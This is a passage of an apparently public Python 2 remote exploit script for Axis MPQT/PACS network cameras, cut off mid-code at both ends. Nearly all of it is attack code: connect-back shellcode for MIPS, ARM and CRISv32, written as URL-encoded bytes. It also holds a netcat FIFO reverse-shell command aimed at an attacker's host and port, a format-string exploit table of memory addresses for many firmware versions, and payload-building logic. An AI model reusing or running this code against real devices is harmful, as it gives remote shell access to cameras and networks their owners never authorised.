\npwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() \npwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) \nauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) \nopener = urllib2.build_opener(auth_handler) \nurllib2.install_opener(opener) \nexcept Exception as e: \nprint \"[!] Basic Auth Error:\",e \nsys.exit(1) \n \nif self.noexploit and not self.verbose: \nprint \"[<] 204 Not Sending!\" \nhtml = \"Not sending any data\" \nelse: \ndata = None \nreq = urllib2.Request(url, data, headers) \nrsp = urllib2.urlopen(req) \nif rsp: \nprint \"[<] %s OK\" % rsp.code \nhtml = rsp.read() \nreturn html \n \n \nclass shellcode_db: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef sc(self,target): \nself.target = target \n \n \n# Connect back shellcode \n# \n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\" \n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators \n# MIPSel: Written by Jacob Holcomb (url encoded by me) \n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php \n# \n# Slightly modified syscall's \nMIPSel = string.join([ \n#close stdin \n\"%ff%ff%04%28\" #slti a0,zero,-1 \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stdout \n\"%11%11%04%28\" #slti a0,zero,4369 \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n#close stderr \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%a6%0f%02%24\" #li v0,4006 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# socket AF_INET (2) \n\"%fd%ff%0c%24\" #li t4,-3 \n\"%27%20%80%01\" #nor a0,t4,zero \n\"%27%28%80%01\" #nor a1,t4,zero \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%57%10%02%24\" #li v0,4183 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF \n# \n# dup2 stdout \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# dup2 stderr \n\"%c9%0f%02%24\" #li v0,4041 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n# Port \n\"PP1PP0%05%3c\" \n\"%01%ff%a5%34\" \n# \n\"%01%01%a5%20\" #addi a1,a1,257 \n\"%f8%ff%a5%af\" #sw a1,-8(sp) \n# \n# IP \n\"IP3IP4%05%3c\" \n\"IP1IP2%a5%34\" \n# \n\"%fc%ff%a5%af\" #sw a1,-4(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ef%ff%0c%24\" #li t4,-17 \n\"%27%30%80%01\" #nor a2,t4,zero \n\"%4a%10%02%24\" #li v0,4170 \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n# \n\"%62%69%08%3c\" #lui t0,0x6962 \n\"%2f%2f%08%35\" #ori t0,t0,0x2f2f \n\"%ec%ff%a8%af\" #sw t0,-20(sp) \n\"%73%68%08%3c\" #lui t0,0x6873 \n\"%6e%2f%08%35\" #ori t0,t0,0x2f6e \n\"%f0%ff%a8%af\" #sw t0,-16(sp \n\"%ff%ff%07%28\" #slti a3,zero,-1 \n\"%f4%ff%a7%af\" #sw a3,-12(sp) \n\"%fc%ff%a7%af\" #sw a3,-4(sp \n\"%ec%ff%a4%23\" #addi a0,sp,-20 \n\"%ec%ff%a8%23\" #addi t0,sp,-20 \n\"%f8%ff%a8%af\" #sw t0,-8(sp) \n\"%f8%ff%a5%23\" #addi a1,sp,-8 \n\"%ec%ff%bd%27\" #addiu sp,sp,-20 \n\"%ff%ff%06%28\" #slti a2,zero,-1 \n\"%ab%0f%02%24\" #li v0,4011 (execve) \n\"%4c%f7%f7%03\" #syscall 0xdfdfd \n], '') \n \n# Working netcat shell \n# - $PATH will locate 'mkfifo', 'nc' and 'rm' \n# - LHOST / LPORT will be changed on the fly later in the code \n# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting \n# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator] \n# $ echo -n \"$IFS\" | hexdump -C \n# 00000000 20 09 0a \n# - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c] \n# \n# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator \n# \n# Working with Apache and Boa \n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\" \nNCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\" \n \nARMel = string.join([ \n# original: http://shell-storm.org/shellcode/files/shellcode-754.php \n# 32-bit instructions, enter thumb mode \n\"%01%10%8f%e2\" # add r1, pc, #1 \n\"%11%ff%2f%e1\" # bx r1 \n \n# 16-bit thumb instructions follow \n# \n# socket(2, 1, 0) \n\"%02%20\" #mov r0, #2 \n\"%01%21\" #mov r1, #1 \n\"%92%1a\" #sub r2, r2, r2 \n\"%0f%02\" #lsl r7, r1, #8 \n\"%19%37\" #add r7, r7, #25 \n\"%01%df\" #svc 1 \n# \n# connect(r0, &addr, 16) \n\"%06%1c\" #mov r6, r0 \n\"%08%a1\" #add r1, pc, #32 \n\"%10%22\" #mov r2, #16 \n\"%02%37\" #add r7, #2 \n\"%01%df\" #svc 1 \n# \n# dup2(r0, 0/1/2) \n\"%3f%27\" #mov r7, #63 \n\"%02%21\" #mov r1, #2 \n# \n#lb: \n\"%30%1c\" #mov r0, r6 \n\"%01%df\" #svc 1 \n\"%01%39\" #sub r1, #1 \n\"%fb%d5\" #bpl lb \n# \n# execve(\"/bin/sh\", [\"/bin/sh\", 0], 0) \n\"%05%a0\" #add r0, pc, #20 \n\"%92%1a\" #sub r2, r2, r2 \n\"%05%b4\" #push {r0, r2} \n\"%69%46\" #mov r1, sp \n\"%0b%27\" #mov r7, #11 \n\"%01%df\" #svc 1 \n# \n\"%c0%46\" # .align 2 (NOP) \n\"%02%00\" # .short 0x2 (struct sockaddr) \n\"PP1PP0\" # .short 0x3412 (port: 0x1234) \n\"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1) \n# .ascii \"/bin/sh\\0\\0\" \n\"%2f%62%69%6e\" # /bin \n\"%2f%73%68%00%00\" # /sh\\x00\\x00 \n\"%00%00%00%00\" \n\"%c0%46\" \n], '') \n \n \n# Connect-back shell for Axis CRISv32 \n# Written by mcw noemail eu 2016 \n# \nCRISv32 = string.join([ \n#close(0) \n\"%7a%86\" # clear.d r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(1) \n\"%41%a2\" # moveq 1,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n#close(2) \n\"%42%a2\" # moveq 2,r10 \n\"%5f%9c%06%00\" # movu.w 0x6,r9 \n\"%3d%e9\" # break 13 \n# \n\"%10%e1\" # addoq 16,sp,acr \n\"%42%92\" # moveq 2,r9 \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%02%f2\" # addq 2,acr \n#PORT \n\"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 # \n\"%df%9b\" # move.w r9,[acr] \n\"%10%e1\" # addoq 16,sp,acr \n\"%6f%96\" # move.d acr,r9 \n\"%04%92\" # addq 4,r9 \n#IP \n\"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr \n\"%e9%fb\" # move.d acr,[r9] \n# \n#socket() \n\"%42%a2\" # moveq 2,r10 \n\"%41%b2\" # moveq 1,r11 \n\"%7c%86\" # clear.d r12 \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%41%a2\" # moveq 1,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# \n\"%6a%96\" # move.d $r10,$r9 \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%ef%9b\" # move.d $r9,[$acr] \n\"%0c%e1\" # addoq 12,$sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%10%92\" # addq 16,$r9 \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%69%b6\" # move.d $r9,$r11 \n\"%50%c2\" # moveq 16,$r12 \n# \n# connect() \n\"%6e%96\" # move.d $sp,$r9 \n\"%e9%af\" # move.d $r10,[$r9+] \n\"%e9%bf\" # move.d $r11,[$r9+] \n\"%e9%cf\" # move.d $r12,[$r9+] \n\"%43%a2\" # moveq 3,$r10 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%5f%9c%66%00\" # movu.w 0x66,$r9 \n\"%3d%e9\" # break 13 \n# dup(0) already in socket \n#dup(1) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%41%b2\" # moveq 1,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#dup(2) \n\"%6f%aa\" # move.d [$acr],$r10 \n\"%42%b2\" # moveq 2,$r11 \n\"%5f%9c%3f%00\" # movu.w 0x3f,$r9 \n\"%3d%e9\" # break 13 \n# \n#execve(\"/bin/sh\",NULL,NULL) \n\"%90%e2\" # subq 16,$sp \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%a6\" # move.d $sp,$10 \n\"%6f%0e%2f%2f%62%69\" # move.d 69622f2f,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0 \n\"%e9%0b\" # move.d $r0,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%04%92\" # addq 4,$r9 \n\"%e9%ab\" # move.d $r10,[$r9] \n\"%04%92\" # addq 4,$r9 \n\"%79%8a\" # clear.d [$r9] \n\"%10%e2\" # addq 16,$sp \n\"%6e%f6\" # move.d $sp,$acr \n\"%6e%96\" # move.d $sp,$r9 \n\"%6e%b6\" # move.d $sp,$r11 \n\"%7c%86\" # clear.d $r12 \n\"%4b%92\" # moveq 11,$r9 \n\"%3d%e9\" # break 13 \n], '') \n \n \nif self.target == 'MIPSel': \nreturn MIPSel \nelif self.target == 'ARMel': \nreturn ARMel \nelif self.target == 'CRISv32': \nreturn CRISv32 \nelif self.target == 'NCSH1': \nreturn NCSH \nelif self.target == 'NCSH2': \nreturn NCSH \nelse: \nprint \"[!] Unknown shellcode! (%s)\" % str(self.target) \nsys.exit(1) \n \n \nclass FMSdb: \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \n \ndef FMSkey(self,target): \nself.target = target \n \ntarget_db = { \n \n#----------------------------------------------------------------------- \n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) \n#----------------------------------------------------------------------- \n \n# \n# Using POP format string, AKA 'Old Style' \n# \n# MPQT \n'MIPS-5.85.x': [ \n0x41f370, # Adjust to GOT free() address \n0x420900, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.40.3': [ \n0x41e41c, # Adjust to GOT free() address \n0x4208cc, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.4x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x42097c, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'ax', # Aligns injected code \n450, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.5x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.55x': [ \n0x41d11c, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n11, # 1st POP's \n9, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.6x': [ \n0x41d048, # Adjust to GOT free() address \n0x41f728, # .bss shellcode address \n5, # 1st POP's \n15, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n \n], \n \n# MPQT \n'MIPS-5.7x': [ \n0x41d04c, # Adjust to GOT free() address \n0x41f718, # .bss shellcode address \n2, # 1st POP's \n14, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.75x': [ \n0x41c498, # Adjust to GOT free() address \n0x41daf0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# Shared with MPQT and PACS \n'MIPS-5.8x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e740, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-5.9x': [ \n0x41d0c0, # Adjust to GOT free() address \n0x41e750, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.1x': [ \n0x41c480, # Adjust to GOT free() address \n0x41dac0, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.2x': [ \n0x41e578, # Adjust to GOT free() address \n0x41fae0, # .bss shellcode address \n2, # 1st POP's \n2, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# MPQT \n'MIPS-6.20x': [ \n0x41d0c4, # Adjust to GOT free() address \n0x41e700, # .bss shellcode address \n3, # 1st POP's \n13, # 2nd POP's \n'axi', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.3x': [ \n0x41e4cc, # Adjust to GOT free() address \n0x420a78, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# PACS \n'MIPS-1.1x': [ \n0x41e268, # Adjust to GOT free() address \n0x420818, # .bss shellcode address \n7, # 1st POP's \n11, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'MIPSel' # Shellcode type \n], \n \n# \n# Tested with execstack to set executable stack flag bit on bin's and lib's \n# \n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. \n# \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.50x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1e7c8, # .bss shellcode address \n93, # 1st POP's \n1, # 2nd POP's \n'axis', # Aligns injected code \n700, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# ARMel with bin/libs executable stack flag set with 'execstack' \n# MPQT \n'ARM-5.55x': [ # \n0x1c15c, # Adjust to GOT free() address \n0x1e834, # .bss shellcode address \n59, # 1st POP's \n80, # 2nd POP's \n'axis', # Aligns injected code \n800, # How big buffer before shellcode \n'ARMel' # Shellcode type (ARMel) \n], \n \n# \n# Using direct parameter access format string, AKA 'New Style' \n# \n# MPQT \n'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) \n0x1c1b4, # Adjust to GOT free() address \n0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.2x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.4x': [ # \n0x1c1b4, # Adjust to GOT free() address \n0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n61, # 1st POP's \n115, # 2nd POP's \n143, # 3rd POP's \n118, # 4th POP's \n'NCSH2' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'ARM-NCSH-5.5x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.6x': [ # \n0x1c15c, # Adjust to GOT free() address \n0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n97, # 1st POP's \n0, # 2nd POP's \n41, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-5.7x': [ # \n0x1c1c0, # Adjust to GOT free() address \n0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n132, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n0, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# Will go in endless loop after exit of nc shell... DoS sux \n# MPQT \n'ARM-NCSH-5.8x': [ # \n0x1b39c, # Adjust to GOT free() address \n0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n98, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n \n# MPQT \n'ARM-NCSH-6.1x': [ # \n0x1d2a4, # Adjust to GOT free() address \n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\" \n106, # 1st POP's \n0, # 2nd POP's \n34, # 3rd POP's \n1, # 4th POP's \n'NCSH1' # Shellcode type (Netcat Shell) \n], \n# \n# Using POP format string, AKA 'Old Style' \n# \n \n# MPQT \n'CRISv32-5.5x': [ # \n0x8d148, # Adjust to GOT free() address \n0x8f5a8, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.4x': [ # \n0x8d0e0, # Adjust to GOT free() address \n0x8f542, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.2x': [ # \n0x8d0b4, # Adjust to GOT free() address \n0x8f4d6, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n], \n \n# MPQT \n'CRISv32-5.20.0': [ # \n0x8d0e4, # Adjust to GOT free() address \n0x8f546, # .bss shellcode address \n4, # 1st POP's \n13, # 2nd POP's \n'axis', # Aligns injected code \n470, # How big buffer before shellcode \n'CRISv32' # Shellcode type (Crisv32) \n] \n \n \n} \n \nif self.target == 0: \nreturn target_db \n \nif not self.target in target_db: \nprint \"[!] Unknown FMS key: %s!\" % self.target \nsys.exit(1) \n \nif self.verbose: \nprint \"[Verbose] Number of availible FMS keys:\",len(target_db) \n \nreturn target_db \n \n \n# \n# Validate correctness of HOST, IP and PORT \n# \nclass Validate: \n \ndef __init__(self,verbose): \nself.verbose = verbose \n \n# Check if IP is valid \ndef CheckIP(self,IP): \nself.IP = IP \n \nip = self.IP.split('.') \nif len(ip) != 4: \nreturn False \nfor tmp in ip: \nif not tmp.isdigit(): \nreturn False \ni = int(tmp) \nif i < 0 or i > 255: \nreturn False \nreturn True \n \n# Check if PORT is valid \ndef Port(self,PORT): \nself.PORT = PORT \n \nif int(self.PORT) < 1 or int(self.PORT) > 65535: \nreturn False \nelse: \nreturn True \n \n# Check if HOST is valid \ndef Host(self,HOST): \nself.HOST = HOST \n \ntry: \n# Check valid IP \nsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP \n# Or we check again if it is correct typed IP \nif self.CheckIP(self.HOST): \nreturn self.HOST \nelse: \nreturn False \nexcept socket.error as e: \n# Else check valid DNS name, and use the IP address \ntry: \nself.HOST = socket.gethostbyname(self.HOST) \nreturn self.HOST \nexcept socket.error as e: \nreturn False \n \n \n \nif __name__ == '__main__': \n \n# \n# Help, info and pre-defined values \n# \nINFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]' \nHTTP = \"http\" \nHTTPS = \"https\" \nproto = HTTP \nverbose = False \nnoexploit = False \nlhost = '192.168.0.1' # Default Local HOST \nlport = '31337' # Default Local PORT \nrhost = '192.168.0.90' # Default Remote HOST \nrport = '80' # Default Remote PORT \n# Not needed for the SSI exploit, here for possible future usage. \n# creds = 'root:pass' \ncreds = False \n \n# \n# Try to parse all arguments \n# \ntry: \narg_parser = argparse.ArgumentParser( \n# prog=sys.argv[0], \nprog='axis-ssid-PoC.py', \ndescription=('[*]' + INFO + '\\n')) \narg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') \narg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') \narg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') \narg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') \narg_parser.add_argument('--fms', required=False, help='Manual FMS key') \nif creds: \narg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') \narg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') \narg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') \narg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') \narg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') \nargs = arg_parser.parse_args() \nexcept Exception as e: \nprint INFO,\"\\nError: %s\\n\" % str(e) \nsys.exit(1) \n \n# We want at least one argument, so print out help \nif len(sys.argv) == 1: \narg_parser.parse_args(['-h']) \n \nprint \"\\n[*]\",INFO \n \nif args.verbose: \nverbose = args.verbose \n \n# Print out info from dictionary \nif args.dict: \ntarget = FMSdb(rhost,verbose).FMSkey(0) \nprint \"[db] Number of FMS keys:\",len(target) \n \n# Print out detailed info from dictionary \nif verbose: \n \nprint \"[db] Target details of FMS Keys availible for manual xploiting\" \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\" \n \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] == 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\" \nfor tmp in range(0,len(target)): \nKey = sorted(target.keys())[tmp] \ntemp = re.split('[-]',Key)[0:10] \n \nif temp[1] != 'NCSH': \nprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6] \n \nprint \"\\n\" \nelse: \nprint \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\" \nKey = \"\" \nfor tmp in range(0,len(target)): \nKey += sorted(target.keys())[tmp] \nKey += ', ' \nprint '\\n',Key,'\\n' \nsys.exit(0) \n \n# \n# Check validity, update if needed, of provided options \n# \nif args.https: \nproto = HTTPS \nif not args.rport: \nrport = '443' \n \nif creds and args.auth: \ncreds = args.auth \n \nif args.noexploit: \nnoexploit = args.noexploit \n \nif args.rport: \nrport = args.rport \n \nif args.rhost: \nrhost = args.rhost \n \nif args.lport: \nlport = args.lport \n \nif args.lhost: \nlhost = args.lhost \n \n# Check if LPORT is valid \nif not Validate(verbose).Port(lport): \nprint \"[!] Invalid LPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if RPORT is valid \nif not Validate(verbose).Port(rport): \nprint \"[!] Invalid RPORT - Choose between 1 and 65535\" \nsys.exit(1) \n \n# Check if LHOST is valid IP or FQDN, get IP back \nlhost = Validate(verbose).Host(lhost) \nif not lhost: \nprint \"[!] Invalid LHOST\" \nsys.exit(1) \n \n# Check if RHOST is valid IP or FQDN, get IP back \nrhost = Validate(verbose).Host(rhost) \nif not rhost: \nprint \"[!] Invalid RHOST\" \nsys.exit(1) \n \n \n# \n# Validation done, start print out stuff to the user \n# \nif noexploit: \nprint \"[i] Test mode selected, no exploiting...\" \nif args.https: \nprint \"[i] HTTPS / SSL Mode Selected\" \nprint \"[i] Remote target IP:\",rhost \nprint \"[i] Remote target PORT:\",rport \nprint \"[i] Connect back IP:\",lhost \nprint \"[i] Connect back PORT:\",lport \n \nrhost = rhost + ':' + rport \n \n# \n# FMS key is required into this PoC \n# \nif not args.fms: \nprint \"[!] FMS key is required!\" \nsys.exit(1) \nelse: \nKey = args.fms \nprint \"[i] Trying with FMS key:\",Key \n \n# \n# Prepare exploiting \n# \n# Look up the FMS key in dictionary and return pointer for FMS details to use \ntarget = FMSdb(rhost,verbose).FMSkey(Key) \n \nif target[Key][6] == 'NCSH1': \nNCSH1 = target[Key][6] \nNCSH2 = \"\" \nelif target[Key][6] == 'NCSH2': \nNCSH2 = target[Key][6] \nNCSH1 = \"\" \nelse: \nNCSH1 = \"\" \nNCSH2 = \"\" \n \nif Key == 'ARM-NCSH-5.8x': \nprint \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\" \nsys.exit(0) \n \nprint \"[i] Preparing shellcode:\",str(target[Key][6]) \n \n# We don't use url encoded shellcode with Netcat shell \n# This is for MIPS/CRISv32 and ARM shellcode \nif not NCSH1 and not NCSH2: \nFMSdata = target[Key][4] # This entry aligns the injected shellcode \n \n# Building up the url encoded shellcode for sending to the target, \n# and replacing LHOST / LPORT in shellcode to choosen values \n \n# part of first 500 decoded bytes will be overwritten during stage #2, and since \n# there is different 'tailing' on the request internally, keep it little more than needed, to be safe. \n# Let it be 0x00, just for fun. \nFMSdata += '%00' * target[Key][5] \n \n# Connect back IP to url encoded \nip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) \nip_hex = ip_hex.split() \nIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; \n \n# Let's break apart the hex code of LPORT into two bytes \nport_hex = hex(int(lport))[2:] \nport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) \nport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) \nport_hex = port_hex.split() \n \nif (target[Key][6]) == 'MIPSel': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%ff\" \nPP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'CRISv32': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: 